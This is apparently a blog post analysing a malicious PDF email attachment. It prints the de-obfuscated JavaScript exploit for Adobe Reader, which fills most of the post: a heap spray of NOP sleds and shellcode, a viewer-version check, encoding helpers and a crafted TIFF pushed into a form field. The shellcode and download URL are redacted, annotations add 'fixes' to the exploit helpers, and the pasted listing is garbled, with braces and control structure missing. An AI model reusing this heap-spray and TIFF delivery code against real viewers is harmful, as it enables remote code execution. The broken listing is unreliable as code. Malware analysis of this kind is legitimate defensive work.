Decoding a PDF Virus E-Mail

Today I received a malicious email via Gmail.

Title: “Check this. It might be useful for u.”
From: via 11:55 AM (2 hours ago) to Nick

The body contained some garbled HTML, plus a MIME PDF attachment named “621624.pdf”.

The email came from someone who must have had me in their address book, as I had communicated with them years ago. That does not mean they sent it knowingly: either their account or machine was compromised and the contact list harvested, or the From: address was simply spoofed — sender headers are not authenticated by default, so a familiar name is no evidence that an attachment is safe.

Of course I had to investigate, so I uploaded the PDF for further analysis. (Anything beyond static inspection should happen in an isolated, disposable VM; do not open such an attachment in a normal PDF reader.)

The PDF contained an embedded JavaScript payload, which was itself further obfuscated.

After manually de-obfuscating the outer layer I ended up with:

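// Outer obfuscation layer: every "%" of a URL-escaped string was replaced with
// the token "a3tf31jre" so the payload does not look like escaped code.
// Reversing the substitution and running the result through unescape() yields
// the plain-text exploit script listed below.
// (The "(redacted)" marker was part of the prose, not the code; it now lives
// in a comment so the listing parses.)
var encoded = "a3tf31jre0........."; // (redacted)
var decode1 = encoded.replace(/a3tf31jre/g, "%"); // restore the "%" escapes
var decoded = unescape(decode1); // second layer: percent-decode to plain script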

Decoding the `encoded` string yields the actual exploit script:

// Global array that heap_spray3() fills with 0x190 spray blocks (it writes
// j_IgC[i] for i = 0..0x18f); the four initial numbers are overwritten by the
// first four iterations of that loop and carry no other meaning.
var j_IgC = [31, 31, 15, 23];

// Indirection that hides the reference to the viewer's global `app` object
// (the Acrobat JavaScript API root; get_ver() reads app.viewerVersion through it).
function _k_m() {
  var viewer = app;
  return viewer;
}

// Thin wrapper around unescape(): turns "%uXXXX" / "%XX" escape text into the
// raw characters it encodes. Used for the shellcode and the 0x9090 NOP filler.
function _b_(xVgFqV) {
  return unescape(xVgFqV);
}

// Reads app.viewerVersion and normalises it to a four-digit integer for the
// comparisons in exploit(): 9.3 -> "9.3" -> "93" -> "9300" -> 9300.
// Only the first "." is removed (String.replace with a string pattern), so a
// value with two dots such as "9.3.1" would become parseInt("93.1") = 93;
// apparently acceptable here because viewerVersion is a Number (note the
// .toString() call), so it carries at most one dot.
function get_ver() {
  var digits = _k_m().viewerVersion.toString().replace(".", "");
  // right-pad with zeros to four characters
  for (var n = digits.length; n < 4; n++) {
    digits = digits + "0";
  }
  return parseInt(digits, 10);
}

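// Grows `xVgFqV` by repeated doubling until it covers `len` BYTES (a JS string
// character is two bytes, hence the *2 / /2), then cuts it to exactly len/2
// characters. Used to build the NOP sled and the 0x80000-0x40 byte spray block.
// Fix: an empty seed string never grows, so the original looped forever on "";
// it now returns "" (a zero-length block) immediately.
function make_block(xVgFqV, len) {
  if (xVgFqV.length === 0) {
    return "";
  }
  var chars = len / 2;
  var block = xVgFqV;
  while (block.length < chars) {
    block += block;
  }
  return block.substring(0, chars);
}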

// Heap spray. Builds one block of shellcode followed by a 0x9090 (two x86 NOP
// bytes per char) sled, sized so shellcode + sled is exactly 0x2000 bytes,
// repeats that unit to fill a 0x80000-0x40 byte block, and stores 0x190 (400)
// copies in the global j_IgC array so the viewer's heap fills with sled+shellcode.
// `scode` is the shellcode in "%uXXXX" escape form (the output of str2uni).
function heap_spray3(scode) {
  var shellcode = _b_(scode);              // unescape to raw characters
  var shellcodeBytes = shellcode.length * 2;
  var nop = _b_("%u9090");
  var sled = make_block(nop, 0x2000 - shellcodeBytes);
  // 0x40 bytes short of 512 KB; presumably leaves room for the string's
  // allocation header so each block lands on a predictable boundary — unverified.
  var chunk = make_block(shellcode + sled, 0x80000 - 0x40);
  var i = 0;
  while (i < 0x190) {
    // Drop the last char and re-append a NOP: same content and length, but
    // presumably forces each element to be a separate string allocation
    // rather than 400 references to one block — a common spray trick, unverified.
    j_IgC[i] = chunk.substr(0, chunk.length - 1) + nop;
    i++;
  }
}

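// Repeats `xVgFqV` by doubling until it is at least `len` CHARACTERS long
// (unlike make_block this counts chars, not bytes), then truncates to `len`.
// Used for the 0x2ae8-char filler inside the crafted TIFF.
// Fix: an empty seed never grows, so the original looped forever on "";
// it now returns "" immediately.
function make_str(xVgFqV, len) {
  if (xVgFqV.length === 0) {
    return "";
  }
  var str = xVgFqV;
  while (str.length < len) {
    str += str;
  }
  return str.substring(0, len);
}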

// Formats `num` as lowercase hex, left-padded with "0" to an even number of
// digits (0x1 -> "01", 0x123 -> "0123"). Helper for str2uni().
function num2hex(num) {
  var hex = num.toString(16);
  if (hex.length % 2 === 1) {
    hex = "0" + hex;
  }
  return hex;
}

// Re-encodes a byte string as "%uXXXX" escapes, two bytes per escape with the
// second byte first ("AB" -> "%u4241"), i.e. little-endian 16-bit units, which
// is the form _b_()/unescape() turns back into the shellcode characters.
// An odd-length input ends with a NaN char code ("%u0NaN.."), as in the original.
function str2uni(xVgFqV) {
  var parts = [];
  for (var i = 0; i < xVgFqV.length; i += 2) {
    var hi = num2hex(xVgFqV.charCodeAt(i + 1));
    var lo = num2hex(xVgFqV.charCodeAt(i));
    parts.push("%u" + hi + lo);
  }
  return parts.join("");
}

// Converts a hex string ("4142") into the characters it encodes ("AB");
// applied to the redacted sc_hex shellcode before str2uni() re-encodes it.
// NOTE(review): the paste collapsed three things onto the long line below —
// the end of hex2str, the top-level `exploit();` call that fires the chain
// when the PDF's script runs, and the opening of exploit() itself, which then
// runs to the end of the listing. All braces were lost in this dump.
function hex2str(hex)
var ret = "";
for (var i = 0;i < hex.length;i += 2) { var b = hex.substr(i,2); var num = parseInt(b,16); ret += String.fromCharCode(num); } return ret; } exploit(); function exploit() { var ver = get_ver(); if (ver >= 8000)
// exploit(): everything below runs only when get_ver() >= 8000, i.e.
// app.viewerVersion 8.0 and up.
// `tiff` is base64: "SUkqAA.." decodes to 49 49 2A 00 = "II*\0", the
// little-endian TIFF magic, followed by 38 20 00 00 (looks like an IFD offset
// of 0x2038 — unverified). The value handed to the form field is therefore a
// crafted TIFF image, not script.
var tiff = "SUkqADggAABB";
// 0x2ae8 chars of base64 "QUFB" (= "AAA"): filler inside the TIFF.
var nops = make_str("QUFB",0x2ae8);
// `start`, `foot` and `sc_hex` are the version-specific exploit body and the
// hex-encoded shellcode, redacted by the author. (The `=` is also missing from
// the `start` line in the paste.)
var start "..."; (redacted)
var foot = "";
var sc_hex = "";

// Two payload variants keyed on the threshold 8201. The if/else structure was
// lost in the paste: the first foot/sc_hex pair is presumably the ver < 8201
// case and the second pair the else branch — inferred from the duplicated
// assignments, not visible in the dump.
if (ver < 8201)
foot = "..."; (redacted)
var sc_hex = "..."; (redacted)
foot = "..."; (redacted)
sc_hex = "..."; (redacted)

// Only proceed if one of the version branches populated `foot`.
if (foot.length)
// The whole TIFF blob (header + filler + version-specific tail) as base64.
var ret = [tiff,nops,start,foot].join("");
// hex shellcode -> raw chars -> "%uXXXX" form expected by heap_spray3().
var sc_str = hex2str(sc_hex);
var scode = str2uni(sc_str);
// pwzh6lr is not defined anywhere in the visible listing; `rawValue` looks like
// the XFA form-field value property, so this is presumably an XFA field in the
// PDF's form template, and assigning the crafted TIFF to it is what makes the
// viewer parse the image — unverified.
// NOTE(review): no call to heap_spray3(scode) appears in the listing even
// though `scode` is computed for it; it was either lost in the paste or sits
// in the redacted portion.
pwzh6lr.rawValue = ret;

Once the viewer's heap has been sprayed with the NOP sled and shellcode, the injected payload reaches out and downloads an executable from a remote URL (redacted). I have not analyzed the executable itself, but I would assume it is some sort of trojan. Note that the exploit is specific to Adobe Reader/Acrobat — it reads `app.viewerVersion`, only proceeds for versions at or above 8.0, and picks one of two payloads on either side of the 8201 threshold — and the download URL is the indicator worth blocking at the proxy or DNS layer.